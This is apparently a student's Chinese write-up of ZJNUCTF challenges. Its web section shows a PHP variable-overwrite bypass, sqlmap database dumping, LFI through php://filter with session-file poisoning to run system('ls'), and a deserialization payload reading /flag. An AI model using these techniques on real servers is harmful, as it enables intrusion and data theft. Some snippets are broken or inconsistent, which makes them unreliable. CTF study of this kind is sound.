WEB
1.easy_php
<?php
highlight_file("index.php"); #高亮代碼
include("flag.php"); #包含flag.php文件
$_aaa = "No No No";
$_bbb = "Welcome";
if($_SERVER["REQUEST_METHOD"]!="POST"){ #判斷上傳類型是不是POST,如果不是,就die
die("\n"."Welcome to ZJNUCTF!");
}
if(!isset($_POST["flag"])){ #POST一個flag變量
die ($_aaa);
}
foreach ($_GET as $key => $value){ #遍歷一下post上來的數組
$$key = $$value;
}
foreach ($_POST as $key => $value){ #遍歷一下get上來的數組
$$key = $value;
}
if ($_POST["flag"]!==$flag){ #如果post上來的變量跟flag.php裏面的變量不一樣,就die
die($_aaa);
}
else
{
echo "This is your flag : ".$flag."\n";
die($_bbb);
}
?>
分析代碼的過程已經在上面了,總而言之就是要post一個flag,如果跟原來的flag一樣,就輸出。
參考鏈接:https://www.freebuf.com/column/150731.html
這裏利用了變量覆蓋漏洞,利用第一個foreach先將$flag的值賦給$_bbb,然後利用die($_bbb)將原本的flag值打印出來。
構造payload:
2.Easysql
沒啥好講的,sqlmap一把嗦。
先用BP抓包,保存爲2.txt
python2 sqlmap.py -r 2.txt --dbs --thread 5
跑了一遍,先跑了sys,發現不是這個數據庫,是test數據庫:
python2 sqlmap.py -r 2.txt -D test --tables --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag --columns --thread 5
python2 sqlmap.py -r 2.txt -D test -T flag -C flag --dump --thread 5
3.lfi2rce
打開鏈接,提示:
提示了user.php,phpinfo.php.分別訪問一下,發現phpinfo.php可以訪問,並且給了php的一系列信息。
在index.php上,有一個文件包含漏洞include($_POST['file']);,上傳一個file變量,就可以獲得想要文件的源碼。利用方法爲:
file=php://filter/read=convert.base64-encode/resource=user.php
PD9waHANCiAgICBzZXNzaW9uX3N0YXJ0KCk7DQogICAgZWNobyAkX0NPT0tJRVsndXNlciddOw0KICAgICRfU0VTU0lPTlsnbmFtZSddID0gJF9DT09LSUVbJ3VzZXInXTsNCg==
base64解碼一下,得到:
<?php
session_start();
echo $_COOKIE['user'];
$_SESSION['name'] = $_COOKIE['user'];
這裏又存在一個cookie文件包含漏洞。先分析一下這個代碼:
echo $_COOKIE['user'];這裏需要我們上傳一個參數,爲user,並且利用cookie傳值的方式傳輸。
$_SESSION['name'] = $_COOKIE['user'];這裏將cookie傳入的值賦給session。
首先我們隨便傳一個值:
傳了一個cookie,值爲admin。
然後去phpinfo對應的路徑去尋找cookie:
/var/lib/php/sessions這個即爲存放路徑,存放格式爲sess_+cookie值。
cookie值的查看方法在:
4stodq9feohijqk3jb9dlshjg4這個即爲cookie。
那麼cookie存放的絕對路徑爲:/var/lib/php/sessions/sess_4stodq9feohijqk3jb9dlshjg4
我們再利用index.php的文件包含漏洞包涵一下cookie:
bmFtZXxzOjU6ImFkbWluIjs= ==>name|s:5:"admin";
將獲得的數據base64解碼以後,我們發現了我們上傳了cookie。從而我們可以利用這個漏洞,去執行php的命令:
構造惡意用戶名:
<?php system("ls"); ?>
bmFtZXxzOjE4OiI8P3BocCBzeXN0ZW0oImxzIikiOw== ==>name|s:18:"<?php system("ls")";
這裏發現base64解碼的結果跟我們上傳的參數不一樣,應該是被過濾了。想辦法繞過:url編碼繞過。
查看源碼,發現我們已經上傳成功了:
再利用漏洞包含以下cookie:
bmFtZXxzOjIyOiI8P3BocCBzeXN0ZW0oImxzIik7ID8+Ijs= ==>name|s:22:"<?php system("ls"); ?>";
爲什麼還是現實不出來呢,我也不知道爲什麼。經歷了一下午的糾結之後,無意中想到去掉base64會怎麼樣,於是:
file=php://filter/read=convert/resource=/var/lib/php/sessions/sess_28sfnijqudr01hk8smaqkpblq3
找到文件名了,利用文件包含漏洞包含以下就出flag了:
flag{36ab1c89-82fc-4ad6-a459-8af09703d2e7}
4.Babyweb
源碼如下:
<?php
# flag in /flag
class red
{
private $filename = 'index.php';
function __toString()
{
return file_get_contents($this->filename);
}
}
function check($s) { //這個函數的作用,是規定我們輸入的字符的ascii值必須在32-125之間(也就是不能輸入%00)
for($i = 0; $i < strlen($s); $i++)
if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
return false;
return true;
}
if(isset($_GET{'exp'})) {
$exp = (string)$_GET['exp'];
if(check($exp)) {
$obj = unserialize($exp);
echo $obj;
}
}
highlight_file(__FILE__);
其實很簡單,就是一個php反序列化漏洞。需要注意的就是:這裏的filename是private屬性。
private定義的變量,在序列化之後會生成兩個空字節,一般來說空字節用%00表示,但是由於check()函數不允許%00的輸入,所以必須用\00代替,我不知道這一點,所以就崩了。
php腳本如下:
<?php
class red
{
private $filename = '/flag';
}
$a = new red();
echo serialize($a);
?>
這裏的<0x00>就是空字節,如果你直接複製,粘貼的時候在這裏就停下了。除此之外,需要將小寫的s改爲大寫(大佬說是php版本的特性)
果然改了以後上傳就沒毛病,我太菜了。
Crypto
1.hex
base64解碼一下,然後放winhex就出來了。
得到666c61677b35306338383535372d653165632d346131302d623439652d3034616130383764303837327d
2.xor
源碼如下:
key="hello"
flag="*****************************************"
def pad(x,y):
y=y + (len(x) - len(y)) * chr(len(x) - len(y))
return y
def xor(x1,x2):
c=''
for i in range(len(x1)):
c=c+chr(ord(x1[i:i+1])^ord(x2[i:i+1]))
return c
msg=xor(pad(flag,key),flag)
msg=msg.encode()
#msg=b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'
理一下思路:
pad函數在flag、key的位數確定的情況下,就是一個定值。
xor函數是將x1,x2每一位進行異或。
異或的逆操作就是異或,先執行pad生成一個數(字符)即爲M,M跟flag異或生成msg,我們要得到flag。只需要msg跟M異或即可。
M在flag位數確定,以及key確定的情況下爲定值,所以此題得解。
腳本如下:
key="hello"
flag="*****************************************"
def pad(x,y):
y=y + (len(x) - len(y)) * chr(len(x) - len(y))
return y
def xor(x1,x2):
c=''
for i in range(len(x1)):
c=c+chr(ord(x1[i:i+1])^ord(x2[i:i+1]))
return c
msg = b'\x0e\t\r\x0b\x14E\x17\x1dG\x1dGG\t\x1c\x15\x11\x13\t\x15\x15AE\tFG\x11\x11\t\x14\x16\x10\x16EG\x15\x17\x14\x14\x14\x17Y'
msg = msg.decode()
print(xor(pad(flag,key), msg))
flag{a39c9cc-8157-11ea-bc55-0242ac130003}
reverse
1.Signin
ida反編譯一下,shift+F12直接看到flag。
2.放linux下upx解壓一下,然後ida反編譯即可。
3.RePY
腳本如下:
enc = [
34, 44, 39, 33, 61,
34, 115, 114, 117, 118,
116, 119, 120, 107, 35,
36, 36, 119, 107, 116,
127, 116, 37, 107, 127,
37, 37, 120, 107, 119,
127, 117, 116, 36, 119,
115, 38, 37, 36, 119,
119, 59]
for i in enc:
print(chr(i - 1 ^ 71),end='')
#flag{f5632410-edd1-494c-9cc0-1934d15bcd11}
4.Jvav
用jadx反編譯得到源碼
package defpackage;
import java.util.Scanner;
/* renamed from: Main */
public class Main {
public static void main(String[] args) {
char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'};
String str = new String();
System.out.print("Please input the flag: ");
str = new Scanner(System.in).nextLine();
if (str.length() != 42) {
System.out.println("Wrong!");
return;
}
for (int i = 0; i < 42; i++) {
if ((((str.charAt(i) << 3) + 1) >> 1) != enc[i]) {
System.out.println("Wrong!");
return;
}
}
System.out.println("Right!");
}
}
重點是最後一個for循環,先將flag左移3位,+1後右移一位,具體啥是移位不懂,在java下逆回來就行。
java腳本:
public class a1 {
public static void main(String[] args) {
char[] enc = new char[]{'Ƙ', 'ư', 'Ƅ', 'Ɯ', 'Ǭ', 'Ð', 'Ì', 'Ƅ', 'Ƅ', 'Ɣ', 'Ä', 'ƌ', 'à', '´', 'à', 'Ü', 'À', 'ƌ', '´', 'Ð', 'ä', 'Ɛ', 'À', '´', 'à', 'ä', 'Ô', 'à', '´', 'Ô', 'Ì', 'Ɛ', 'Ä', 'À', 'Ø', 'à', 'ä', 'à', 'à', 'Ð', 'à', 'Ǵ'};
for (int i = 0; i < 42; i++) {
System.out.print(((enc[i] << 1) - 1) >> 3);
System.out.print(',');
}
System.out.println("Right!");
}
}
得到一串數字:
101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124
估計這個是ascii碼,然後用python進行轉換:
list = [101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124]
for i in list:
print(chr(i,end='')
但是結果不對:
ek`fz32``d0b7,76/b,38c/,7847,42c0/5787737|
代碼改一下,改成i+1就對了:
list = [101,107,96,102,122,51,50,96,96,100,48,98,55,44,55,54,47,98,44,51,56,99,47,44,55,56,52,55,44,52,50,99,48,47,53,55,56,55,55,51,55,124]
for i in list:
print(chr(i,end='')
flag{43aae1c8-870c-49d0-8958-53d106898848}
5.Sharpener
// test.Program
// Token: 0x06000002 RID: 2 RVA: 0x000020D0 File Offset: 0x000002D0
private static void Main(string[] args)
{
string[] enc = new string[]
{
"61894b21be75260c4964065b1eecec4d",
"3cd02adb6df3f967c3acda1705bb86f1",
"5c04925674920eb58467fb52ce4ef728",
"ffbb466329361588defb5e30e5df168f",
"448804aefe27492b9c183351328e7500",
"598f5f04d65b4e0e35515b367763fee6",
"d4398f22c157274df2d4643884db6a56",
"37afcb75609159217c5548ed91c0ba1b",
"28cb510090e7e926daa92745a8b02362",
"49f01756d2edd088b64afd670400f4ac",
"9f396fe44e7c05c16873b05ec425cbad",
"958be1aac9d0641822a4dbaa3ad9010f",
"82c89ed04868c75db962bb3bbe2d4b4c",
"36f88e7b053afdaff9f9d792d142a406"
};
Console.Write("Please input the flag: ");
string userInput = Console.ReadLine();
int x = 0;
int ul = 0;
string tmp = "";
if (userInput.Length != 42)
{
Console.WriteLine("That Wrong!");
return;
}
for (int i = 0; i < userInput.Length; i++)
{
tmp += userInput[i].ToString();
x++;
if (x % 3 == 0)
{
if (!enc[ul].Equals(Program.GenerateMD5(tmp)))
{
Console.WriteLine("That Wrong!");
return;
}
x = 0;
tmp = "";
ul++;
}
}
Console.WriteLine("Right!");
}
把這幾個md5值破解拼起來就是一個flag
flag{b66931c0-ec9f-4d1e-bcff-5673ce3d505b}
6.Bytecoding
這個題目有點意思,拿到的是一個文本文檔。內容如下:
3 0 LOAD_CO
56 LOAD_CONST 12 (44)
58 LOAD_CONST 1 (101)
60 LOAD_CONST 14 (48)
62 LOAD_CONST 15 (53)
64 LOAD_CONST 7 (98)
66 LOAD_CONST 9 (51)
68 LOAD_CONST 11 (56)
70 LOAD_CONST 18 (99)
72 LOAD_CONST 1 (101)
74 LOAD_CONST 15 (53)
76 LOAD_CONST 7 (98)
78 LOAD_CONST 7 (98)
80 LOAD_CONST 7 (98)
82 LOAD_CONST 19 (124)
84 BUILD_LIST 42
86 STORE_FAST 0 (enckey)
4 88 LOAD_GLOBAL 0 (input)
90 LOAD_CONST 20 ('GoGoGo Input Flag: ')
92 CALL_FUNCTION 1
94 STORE_FAST 1 (inpt)
5 96 LOAD_GLOBAL 1 (len)
98 LOAD_FAST 1 (inpt)
100 CALL_FUNCTION 1
102 LOAD_CONST 21 (42)
104 COMPARE_OP 3 (!=)
106 POP_JUMP_IF_FALSE 120
6 108 LOAD_GLOBAL 2 (print)
110 LOAD_CONST 22 ('Wrong')
112 CALL_FUNCTION 1
114 POP_TOP
7 116 LOAD_CONST 0 (None)
118 RETURN_VALUE
8 >> 120 SETUP_LOOP 52 (to 174)
122 LOAD_GLOBAL 3 (range)
124 LOAD_CONST 21 (42)
126 CALL_FUNCTION 1
128 GET_ITER
>> 130 FOR_ITER 40 (to 172)
132 STORE_FAST 2 (i)
9 134 LOAD_FAST 0 (enckey)
136 LOAD_FAST 2 (i)
138 BINARY_SUBSCR
140 LOAD_GLOBAL 4 (ord)
142 LOAD_FAST 1 (inpt)
144 LOAD_FAST 2 (i)
146 BINARY_SUBSCR
148 CALL_FUNCTION 1
150 LOAD_CONST 23 (1)
152 BINARY_SUBTRACT
154 COMPARE_OP 3 (!=)
156 POP_JUMP_IF_FALSE 130
10 158 LOAD_GLOBAL 2 (print)
160 LOAD_CONST 22 ('Wrong')
162 CALL_FUNCTION 1
164 POP_TOP
11 166 LOAD_CONST 0 (None)
168 RETURN_VALUE
170 JUMP_ABSOLUTE 130
>> 172 POP_BLOCK
12 >> 174 LOAD_GLOBAL 2 (print)
176 LOAD_CONST 24 ('Right')
178 CALL_FUNCTION 1
180 POP_TOP
182 LOAD_CONST 0 (None)
184 RETURN_VALUE
本來以爲這玩意是彙編,然鵝這個是python字節碼。
看了一下,勉強看懂了一點。
0 LOAD_CO
56 LOAD_CONST 12 (44)
58 LOAD_CONST 1 (101)
60 LOAD_CONST 14 (48)
62 LOAD_CONST 15 (53)
64 LOAD_CONST 7 (98)
66 LOAD_CONST 9 (51)
68 LOAD_CONST 11 (56)
70 LOAD_CONST 18 (99)
72 LOAD_CONST 1 (101)
74 LOAD_CONST 15 (53)
76 LOAD_CONST 7 (98)
78 LOAD_CONST 7 (98)
80 LOAD_CONST 7 (98)
82 LOAD_CONST 19 (124)
84 BUILD_LIST 42
86 STORE_FAST 0 (enckey)
第一塊,應該是一個數組(列表),裏面裝了['101','107','96','102','122','49','98','47','96','101','51','52','56','44','54','98','96','48','44','51','96','51','53','44','97','55','48','54','44','101','48','53','98','51','56','99','101','53','98','98','98','124']這幾個數據。
88 LOAD_GLOBAL 0 (input)
90 LOAD_CONST 20 ('GoGoGo Input Flag: ') inpt=input("GoGoGo Input Flag:")
92 CALL_FUNCTION 1
94 STORE_FAST 1 (inpt)
第二塊反編譯過來應該就是一句代碼。inpt=input("GoGoGo Input Flag:")
96 LOAD_GLOBAL 1 (len)
98 LOAD_FAST 1 (inpt)
100 CALL_FUNCTION 1
102 LOAD_CONST 21 (42)
104 COMPARE_OP 3 (!=)
106 POP_JUMP_IF_FALSE 120
108 LOAD_GLOBAL 2 (print)
110 LOAD_CONST 22 ('Wrong')
112 CALL_FUNCTION 1
114 POP_TOP
第三塊、第四塊大概就是
if len(inpt) != 42:
print("wrong")
之後我就看不大懂了,大概就是inpt跟enckey進行什麼計算,滿足什麼條件才能輸出right。
我這邊看了一下,f的ascii碼是102,enckey的第一個值是101,看看逐個+1以後,會出現什麼結果。
腳本附上:
list=['101','107','96','102','122','49','98','47','96',
'101','51','52','56','44','54','98','96','48','44','51',
'96','51','53','44','97','55','48','54','44','101','48',
'53','98','51','56','99','101','53','98','98','98','124']
for i in list:
print(chr(int(i)+1),end='')
flag{2c0af459-7ca1-4a46-b817-f16c49df6ccc}
這也太神奇了吧
Misc
1.簽到題
關注公衆號,回覆zjnuctf拿flag
2.真·簽到
下載得到一個word,打開隱藏文字即可得到flag。
3.你知道漢信碼嗎
網上找到四個角拼接得到圖
4.Keyboard
參考:
https://www.cnblogs.com/hackxf/p/10670844.html
https://blog.csdn.net/qq_36609913/article/details/78578406
現在linux下執行以下語句:
tshark -r keyboard.pcapng -T fields -e usb.capdata > usbdata.txt
得到一堆數字:
一行有16個數字,兩個數字爲1位,也就是8位。第3位上的數字,就是我們敲擊鍵盤時候所對應的字母。
對照表如下:
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
關注完第位以後,關注第一位,有時候是0,有時候是2,盲猜第一位是2的時候爲按住shift鍵。對了以下,剛好前面幾位是flag{
構造腳本:
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
flag=''
f = open('usbdata.txt','r')
for i in range(200):
l = f.readline()
if l[4:6] == '00':
continue
elif l[0]=='2':
flag += shiftKeys[l[4:6]]
elif l[0]=='0':
flag += normalKeys[l[4:6]]
else:
continue
print(flag)
#flag{4565fd58-c9b2-4544-86f7-872e38433467}
這裏因爲我不知道多少行我就多跑了幾次,python會執行到有錯誤的地方自動停止。
5.有趣的Minecraft
把圖片用winhex打開,找到最後有一行base64,解碼得到cnserver.bi0x.cn
打開遊戲,進去。
flag{22a61e26-6a6c-4130-a39a-15f0ce5c15fc}
6.zip
密碼爲UVWHZAITWAU
圖片上有四種密碼,第一種是MIMIMOYS,第二種是銀河字母,第三種是小人舞旗,第四種是鳥圖騰。
第一種和第四種是啥我不知道,但是不妨礙我爆破。
本來按照表對出來,是HZAIYQ
中間的部分字母然後前三位,後兩位就盲猜,爆破就行。
生成字典的腳本附上:
list='HZAITQ'
all='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
print(len(all))
f=open("pass.txt","a")
for i in all:
for j in all:
for k in all:
for l in all:
for m in all:
for n in all:
flag=i+j+k+list+l+m
f.write(flag+"\n")
f.close()
跑了挺久的,但是不太對,我仔細覈對了一遍,還是錯。
那應該是已知的六位中出了錯。先猜只有一位錯了,試了六次,還費了挺久的時間,終於發現一直的六位,最後一位出錯,是W。orz
然後,打開壓縮包,就得到了flag。
7.Interesting video
flag:000{w3lc0me_1337_players_and_good_luck_with_the_game}
這裏是摩斯密碼,密碼爲.-/-./-..,翻譯過來是and
這裏是旗語,翻譯過來是the。
linux下命令行執行一下,得到game
綜上:000{w3lc0me_1337_players_and_good_luck_with_the_game}